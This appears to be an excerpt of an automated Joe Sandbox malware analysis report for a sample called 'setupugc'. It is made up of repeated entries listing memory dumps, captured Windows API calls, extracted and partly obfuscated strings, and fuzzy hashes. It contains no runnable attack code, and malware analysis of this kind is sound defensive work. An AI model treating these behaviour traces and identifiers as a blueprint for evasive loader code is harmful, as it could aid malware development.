                          Control-flow Graph

                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 02E60D57
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396

                          Control-flow Graph

                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 02E60D57
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396
                          APIs
                          • Sleep.KERNELBASE(000007D0), ref: 02E73AAB
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: net.dll$wininet.dll
                          • API String ID: 3472027048-1269752229
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 02E6F457
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize
                          • String ID: @J7<
                          • API String ID: 2538663250-2016760708
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 02E6F457
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize
                          • String ID: @J7<
                          • API String ID: 2538663250-2016760708
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E644E2
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          APIs
                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02E6826E,00000010,?,?,?,00000044,?,00000010,02E6826E,?,?,?), ref: 02E79723
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateInternalProcess
                          • String ID:
                          • API String ID: 2186235152-0
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E59BE5
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E644E2
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E59BE5
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          APIs
                          • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02E78240
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path$NameName_
                          • String ID:
                          • API String ID: 3514427675-0
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,02E63CF2,000000F4), ref: 02E7966C
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          APIs
                          • RtlAllocateHeap.NTDLL(02E61979,?,02E7571B,02E61979,02E755AF,02E7571B,?,02E61979,02E755AF,00001000,?,?,00000000), ref: 02E7961F
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 02E682DC
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 02E682DC
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                          • Instruction ID: 9fc2f86c37e42becb5bff78802c1a05cedcbb703a1314ff521516101ce436b59
                          • Opcode Fuzzy Hash: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                          • Instruction Fuzzy Hash: 60E0D8794C070017E71056A89E4E76A3218AB04368F1C5754FC7CDB1C7E22CD9468218
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02E61C60,02E77EEF,02E755AF,02E61C30), ref: 02E680D3
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                          • Instruction ID: 2143d903751af623e8b84ed8885ecd9f42c77e591734bc03baa45b48ace0d17a
                          • Opcode Fuzzy Hash: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                          • Instruction Fuzzy Hash: A7E0C2752C03002BF210E6A88C16F5A328D8B44354F019428BD0DDF2C1EA60E50246A1
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02E61C60,02E77EEF,02E755AF,02E61C30), ref: 02E680D3
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                          • Instruction ID: 5d2f10622b11bcf2e8f1a79639a9c06cf786aa061530f988b78b213de42e3c96
                          • Opcode Fuzzy Hash: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                          • Instruction Fuzzy Hash: 44D05E756C03043BF650E7E89C26F6A328D8B447A8F059468BE0DDB2C1E964E5014565
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 02E682DC
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                          • Instruction ID: 0ad3bcbe055f7158ef82e7014886dd7351bb27823d9aca537af7354d4a141f16
                          • Opcode Fuzzy Hash: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                          • Instruction Fuzzy Hash: 65D097342D184004E7209AACB40C3FA7384EB0B3BC7009A00E83C8E9D8C223A8CE4008
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                          • Instruction ID: 21704dffb9f327f28d602b929168d657cc32960343870785edf606786a471765
                          • Opcode Fuzzy Hash: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                          • Instruction Fuzzy Hash: 94B09B719055C5C5EA11F760460CB17794867D1741F19C4A1D2430741F4779D1D1E275
                          Memory Dump Source
                          • Source File: 00000011.00000002.4111979596.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_3750000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d62e397ca1aabc98452a77443a47db1cc18fe800118123973538c3e5a89521f9
                          • Instruction ID: 977d2054312c3112ff2060e0c9512f812e1e3ea4939b6b3e4ff034a7306ba64b
                          • Opcode Fuzzy Hash: d62e397ca1aabc98452a77443a47db1cc18fe800118123973538c3e5a89521f9
                          • Instruction Fuzzy Hash: 7E510471618B0A4FD36CEF6CD085A76B7E2FB88310F54452DE88AC7252DBB4E8428785
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4111979596.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_3750000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                          • API String ID: 0-3558027158
                          • Opcode ID: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                          • Instruction ID: 0900828688ab73f75ebe2a9f9d2194735565dddd216b46a404d637ac30d03770
                          • Opcode Fuzzy Hash: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                          • Instruction Fuzzy Hash: 7D9171F04482988AC7158F54A0612AFFFB1EBC6304F15816DE7E6BB243C3BE8905CB85
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4111979596.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_3750000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                          • API String ID: 0-3228068659
                          • Opcode ID: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                          • Instruction ID: df1711e064b7e75b0c6408a95e63b5ca3c850b7aa13dd796088b1ac313a1a518
                          • Opcode Fuzzy Hash: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                          • Instruction Fuzzy Hash: A92144B081468C8BDF14DF86D995AECBF71FB00348F608108E8446F3A4D7781A42CF8A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                          • Instruction ID: 3f683ee95bb841d681bbd94a7617c6985ab16f3a7601c78e2f5a5c1fd4992e11
                          • Opcode Fuzzy Hash: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                          • Instruction Fuzzy Hash: 8651D6F6A00256BFCB14DF98C99097EF7BCFB4A2407148AA9E4A5D7641D374DE40CBA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                          • Instruction ID: 59a4d2da6dacd6525301ddb14788c819f0979f4e425396a888117d662069a6a7
                          • Opcode Fuzzy Hash: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                          • Instruction Fuzzy Hash: A4510875A04A55AECB30DF9CC89097FF7FDEB44240B088DA9E5D5DB641E7B4DA0087A0
                          Strings
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03964655
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039646FC
                          • Execute=1, xrefs: 03964713
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 03964787
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03964742
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03964725
                          • ExecuteOptions, xrefs: 039646A0
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                          • Instruction ID: a33dfec2e5276b0dc6c4e6e15b7d280eb08007d883385ca49c6a40575bcb158f
                          • Opcode Fuzzy Hash: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                          • Instruction Fuzzy Hash: D9513735A017296ADF10FAE8DC89FAE7BACAF44340F0404E9D505FB186E7719A45CF51
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction ID: a72e106f94263303c3b42572f1ad02e1f07d26af0b80d7a67bbfa83ea1f63550
                          • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                          • Instruction Fuzzy Hash: DB021775518381AFD305CF68C890A6BBBE9EFC8740F08892DF9855B265DB31E905CB52
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction ID: 0466fad1c4cde100c0001cf5744769daee17a83935582127fd5cc290bd8c62f8
                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction Fuzzy Hash: 2481FFF0E412499EDF24DE68C8917FEBBBAEF463A0F1C455AD862A7791C7308840CB51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                          • Instruction ID: 8fe78f0c0fbaa791971238ea3408704cb6db34c01a9e721ca8faae3584fe6bb7
                          • Opcode Fuzzy Hash: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                          • Instruction Fuzzy Hash: 7821517AE00619ABCB10DF69CC40AEFB7ECEF44684F080626E955E7200E734D9018BE1
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039602BD
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039602E7
                          • RTL: Re-Waiting, xrefs: 0396031E
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                          • Instruction ID: 69948268721b64360fe9c2537abebb7dbe172a5968dbf9c812f78cf5ceffcc6c
                          • Opcode Fuzzy Hash: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                          • Instruction Fuzzy Hash: 9BE1DC716087499FD725DF28C884B2AB7E8BF84364F180A6DF4A69B3E0D774D854CB42
                          Strings
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03967B7F
                          • RTL: Re-Waiting, xrefs: 03967BAC
                          • RTL: Resource at %p, xrefs: 03967B8E
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          • Opcode ID: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                          • Instruction ID: 9a86efa35f7d8a6b1d9f4ea71a919f66acf0f971e1f58efc6c2895e79c13591f
                          • Opcode Fuzzy Hash: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                          • Instruction Fuzzy Hash: C5410435305B029FD724DE65CC40B6ABBE9EF88720F040A1DF95AEB680DB31E405CB91
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0396728C
                          Strings
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03967294
                          • RTL: Re-Waiting, xrefs: 039672C1
                          • RTL: Resource at %p, xrefs: 039672A3
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                          • Instruction ID: 053090d102bb98028789e08b7715854f6f5641fb9b8c4f4a6ded4627d216b525
                          • Opcode Fuzzy Hash: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                          • Instruction Fuzzy Hash: 3141EE36701716ABD720DE65CC81F6ABBE9FB84754F140A19F856EB280DB31F8428BD1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                          • Instruction ID: ac3f5e5f32f72dafce18efb802809cd3a4c9574746768b8aecceb99705712495
                          • Opcode Fuzzy Hash: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                          • Instruction Fuzzy Hash: 4B314676A006299FCB20DF2DDC40BEEB7FCEF45654F454995E889E7240EF309A458BA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction ID: 43403293434a17c0819d5470c098a2e89f7b82bb65c0ab6ba4026980d3be3f2b
                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction Fuzzy Hash: AC9194F5E0021A9BDF24DFA9C8816FEB7B9FF467A0F18451AE865E72D0D73099408B50
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                           • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
